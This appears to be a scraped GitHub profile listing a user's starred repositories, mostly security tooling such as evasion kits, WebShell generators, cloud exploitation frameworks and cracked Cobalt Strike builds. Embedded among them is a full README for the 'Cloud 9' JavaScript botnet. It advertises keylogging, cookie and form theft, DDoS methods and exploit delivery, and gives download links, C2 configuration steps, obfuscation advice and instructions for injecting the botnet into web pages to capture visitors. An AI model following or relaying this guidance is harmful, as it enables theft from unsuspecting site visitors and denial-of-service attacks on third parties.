nucleareris Goto Github PK
Name: Eris
Type: User
Name: Eris
Type: User
整理每个流行botnet家族的专杀脚本、靶机环境、检测规则、病毒样本、病毒原理图
重生之我是赏金猎人系列,分享自己和团队在SRC、项目实战漏洞测试过程中的有趣案例
list of bug bounty writeups
web fuzzing && bug hunter
一款基于BurpSuite的被动式shiro检测插件
免杀姿势学习、记录、复现。
冰蝎Java WebShell自动化免杀生成
A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques.
搜狐视频(sohu tv)Redis私有云平台
程序员在家饮品制作指南。Programmer's guide about how to make drinks at home (Chinese only).
Obfuscate specific windows apis with different apis
CTF🚩 AWD (Attack with Defense) 线下赛平台 / AWD platform - 欢迎 Star~ ✨
利用白名单文件 cdb.exe 执行 shellcode
Striping CDN IPs from a list of IP Addresses
Cloud Exploitation Framework 云环境利用框架,方便安全人员在获得 AK 的后续工作
10W首中文歌词数据库
A rule-based tunnel in Go.
auto.js脚本,Android自动化,清理微信僵尸粉
🎭 Javascript deobfuscator for obfuscator.io
I have heavily updated the Cloud 9 JavaScript BotNet Old features: FTP flood Cookie stealing Keylogging Send POST requests Flood POST requests Evaluate JavaScript Code Silently load webpages Clickjacking (iframe follow mouse) New features: Layer 4 / Layer 7 hybrid attack (random min-max size POST flood) Formgrabber fixed (I think) Now has config file Now has bots online list OS detection added Panel is much more sleek You no longer get negative bots when bots repeatedly disconnect or some glitch happens RFI scanner added Added ability to send shellshock exploits You can now open pop-unders Non-DDoS commands run only once Many security updates to the panel The features are: Code Stealerz: cookie clipboard Money makerz: view*[url]* jack*[iframe]*[width]*[height]* popunder*[url]* DDoS Methodz: load*[target url]*[milliseconds between requests]* floodpost*[target url]*[params]*[milliseconds between requests]* glype*[target url]*[glype list url]*[milliseconds between requests]* antiddos*[target url]*[milliseconds between requests]* layer4*[target url]*[minSize-maxSize]*[milliseconds between requests]* Exploitz: exploit*[exe url]* rfiscanner*[target url]*[backdoor url]*[rfi vuln list url]* sendshellshock*[target url]*[command]* Misc: md5*[hash]*[brute length]*[brute alphabet]* sha1*[hash]*[brute length]*[brute alphabet]* post*[url]*[params]* eval*[javascript code]* Always running: Multi-Language Web Keylogger Form Grabber Here is the download link to the botnet (all updates will be here): http://robl0x.cf/cloud9-latest.zip Mirror (will also be updated): http://boatnet.us/Archive/Botnet%20Files...latest.zip Unzip the folder on you server Then edit campaign.js and set master to your servers IP Edit admin/panel4829.php and set a new username and password for the cnc panel One way of getting tons of browsers on your net use traffic exchange sites like hitleap.com or 10khits.com To FTP flood use this command: Code load*ftp://website.com:80/*0* That command will exhaust all of the connections on a webserver with only a few browsers All keylogs that are recorded are sent once the page is closed for stealth To infect a page simply put this html on it: http://pastebin.com/ZAvqJZD8 the first inject is reccommended but it only works if a <head> tag exists on the page. Then whoever visits the page will be on the botnet for as long as they are on the page. I suggest putting a movie on the page so people will stay on the botnet for longer. (Good for ddos attacks) For those of you who dont know the purposes of this botnet are: Website monitoring Ad clicks amd views Getting facebook likes (via clickjacking) Distributed hash cracking Distributed Denial of Service (DDoS) Data stealing IP grabbing Exploiting servers and many more! Here is a picture of an active Cloud 9 botnet with 23 clients (this was before OS detection was added) Spoiler (Click to View) Hope you all love the update! If you have any suggestions for new features send me a PM and I should reply in 1-3 days Here is how to set it up: Code You need to change the master variable in campaign.js to something like this: var master = "http://yoursiteorip"; Also change the connection key for security. var connectKey = "randomshithere"; Also be sure to edit config.php and change the connection key to the one in campaign.js Also in the config it is reccommended that you change the location of the log files and other file locations etc. Be sure to rename/move the files to the places you specified in the config. Once you are done those things obfuscate your campaign.js using this JavaScript obfuscator (or a different one) http://javascriptobfuscator.com/Javascript-Obfuscator.aspx That will protect your campaign.js from people figuring out what it is.
六大云存储,泄露利用检测工具
Azure and AWS Attacks
List of all the Publicly disclosed vulnerabilities of Public Cloud Provider like Amazon Web Services (AWS), Microsoft Azure, Google Cloud, Oracle Cloud, IBM Cloud etc
Cloudflare, Sucuri, Incapsula real IP tracker.
Reconnaissance Real IP address for Cloudflare Bypass
Cloud Discovery - brute force public AWS, GCP, Alibaba, and Azure cloud services
Cobalt Strike 4.5 cracked version.
cobaltstrike4.4\4.3版本破解、去除checksum8特征、bypass BeaconEye
记录代码审计学习的过程,附含源码
《深入理解CodeQL》Finding vulnerabilities with CodeQL.
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google ❤️ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.